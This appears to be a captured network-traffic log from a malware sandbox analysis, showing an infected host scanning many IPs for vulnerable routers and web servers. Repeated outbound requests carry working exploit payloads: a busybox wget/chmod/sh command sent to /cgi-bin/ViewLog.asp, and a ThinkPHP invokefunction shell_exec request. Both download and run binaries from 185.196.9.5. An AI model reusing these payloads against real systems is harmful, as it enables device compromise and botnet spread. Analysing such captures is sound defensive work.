Feb 25, 2024 19:04:38.247060061 CET	274	IN	HTTP/1.0 200 OK Server: httpd/2.0 x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block Date: Sun, 25 Feb 2024 18:08:53 GMT Content-Type: text/html Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 73 63 72 69 70 74 3e 74 6f 70 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 27 2f 4d 61 69 6e 5f 4c 6f 67 69 6e 2e 61 73 70 27 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 48 45 41 44 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><script>top.location.href='/Main_Login.asp';</script></HEAD></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
893	192.168.2.15	36382	31.200.116.171	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:38.159226894 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
894	192.168.2.15	40500	62.29.27.75	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:38.168684006 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
895	192.168.2.15	52098	94.66.105.70	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:38.178267002 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:38.407473087 CET	626	IN	HTTP/1.1 404 Content-Type: text/html;charset=utf-8 Content-Language: en Content-Length: 431 Date: Sun, 25 Feb 2024 18:04:37 GMT Keep-Alive: timeout=5 Connection: keep-alive Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 Not Found</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
896	192.168.2.15	56022	95.216.247.36	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:38.360599995 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:38.555617094 CET	307	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sun, 25 Feb 2024 18:04:38 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
897	192.168.2.15	33802	95.59.208.198	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:38.440411091 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:38.714782953 CET	29	IN	HTTP/1.1 200 OK
Feb 25, 2024 19:04:38.715607882 CET	515	IN	Data Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www

Session ID	Source IP	Source Port	Destination IP	Destination Port
898	192.168.2.15	49848	31.173.157.224	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:38.453912973 CET	334	IN	HTTP/1.0 400 Bad Request Server: httpd/2.0 x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block Date: Sun, 25 Feb 2024 18:08:53 GMT Content-Type: text/html Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 34 3e 0a 4e 6f 20 72 65 71 75 65 73 74 20 66 6f 75 6e 64 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>400 Bad Request</H4>No request found.</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
899	192.168.2.15	46168	95.227.173.94	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:38.911410093 CET	318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:39.111113071 CET	376	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:04:39 GMT Content-Length: 226 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
900	192.168.2.15	55248	95.100.138.88	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:38.916349888 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:39.121313095 CET	480	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Sun, 25 Feb 2024 18:04:39 GMT Date: Sun, 25 Feb 2024 18:04:39 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 64 64 38 36 62 61 35 64 26 23 34 36 3b 31 37 30 38 38 38 34 32 37 39 26 23 34 36 3b 63 34 30 32 38 38 39 32 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.dd86ba5d.1708884279.c4028892</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
901	192.168.2.15	35936	94.123.102.133	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:38.950226068 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
902	192.168.2.15	53958	94.121.111.134	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:38.950299025 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:42.981296062 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:49.125150919 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:01.156990051 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:25.476828098 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
903	192.168.2.15	47396	95.54.209.134	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:38.950784922 CET	318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:39.228534937 CET	121	IN	HTTP/1.1 200 OK Content-Type:text/html Transfer-Encoding:chunked X-Frame-Options:SAMEORIGIN Connection:Keep-Alive
Feb 25, 2024 19:04:39.228585958 CET	1286	IN	Data Raw: 32 38 30 30 0d 0a ef bb bf 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d Data Ascii: 2800<html><head><title></title><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><link href="css/login.css?20150903193402268865-386739753" media="all" rel="stylesheet" /><link href="css/Style.css?20150903193402
Feb 25, 2024 19:04:39.229007959 CET	1286	IN	Data Raw: 4c 61 6e 67 75 61 67 65 20 3d 20 27 27 3b 0d 0a 76 61 72 20 6c 6f 63 6b 6c 65 66 74 74 69 6d 65 72 68 61 6e 64 6c 65 3b 0d 0a 76 61 72 20 53 6f 6e 65 74 46 6c 61 67 20 3d 20 27 30 27 3b 20 0d 0a 0d 0a 69 66 28 56 61 72 5f 4c 61 73 74 4c 6f 67 69 Data Ascii: Language = '';var locklefttimerhandle;var SonetFlag = '0'; if(Var_LastLoginLang == ''){Language = Var_DefaultLang;}else{Language = Var_LastLoginLang;}document.title = ProductName;function getValue(sId){var ite

Session ID	Source IP	Source Port	Destination IP	Destination Port
904	192.168.2.15	41042	94.250.173.91	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:40.172684908 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:40.427360058 CET	498	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:04:40 GMT Server: Apache Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 33 30 32 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><p>Additionally, a 302 Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
905	192.168.2.15	43382	95.101.178.171	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:40.200195074 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:40.999085903 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:41.259769917 CET	480	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Sun, 25 Feb 2024 18:04:41 GMT Date: Sun, 25 Feb 2024 18:04:41 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 62 38 37 61 37 62 35 63 26 23 34 36 3b 31 37 30 38 38 38 34 32 38 31 26 23 34 36 3b 37 39 66 30 38 62 63 65 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.b87a7b5c.1708884281.79f08bce</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
906	192.168.2.15	52268	31.136.99.178	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:40.352740049 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:40.901356936 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:42.021204948 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
